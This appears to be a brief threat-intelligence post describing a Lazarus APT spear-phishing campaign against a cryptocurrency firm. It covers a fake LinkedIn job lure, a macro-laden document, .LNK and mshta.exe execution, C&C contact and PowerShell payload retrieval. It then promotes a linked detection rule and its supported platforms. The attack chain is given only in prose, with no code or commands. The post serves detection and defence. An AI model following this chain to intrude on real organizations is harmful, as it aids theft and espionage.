The Lazarus APT group is one of the few state-sponsored cyber espionage units that also handle financially motivated cybercrimes and it is the most profitable threat actor in the cryptocurrency scene which managed to steal about $2 billion. In 2017 alone, the group stole more than half a billion dollars in cryptocurrency, so their interest in traders and exchanges is not weakening, and they recently launched another attack on a cryptocurrency organization.
This time, Lazarus APT took advantage of an already proven trick and carried out a spear-phishing campaign with a fake LinkedIn job advert aimed at a system administrator in a targeted cryptocurrency organization. The victim received the malicious document with a macro which creates a .LNK file to call out a bit.ly link via execution of mshta.exe. Then the script sends operational information to a C&C server and receives a PowerShell script that can fetch payloads used by Lazarus APT in this campaign.
Emir Erdogan developed the exclusive rule that enables detection of TTPs leveraged by Lazarus Group during this attack: https://tdm.socprime.com/tdm/info/tjZGrUO4B5k0/fFr1KXQBPeJ4_8xcVrLz/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Carbon Black, Elastic Endpoint
Tactics: Execution, Defense Evasion
Techniques: Command-Line Interface (T1059), Indicator Removal on Host (T1070), Modify Registry (T1112)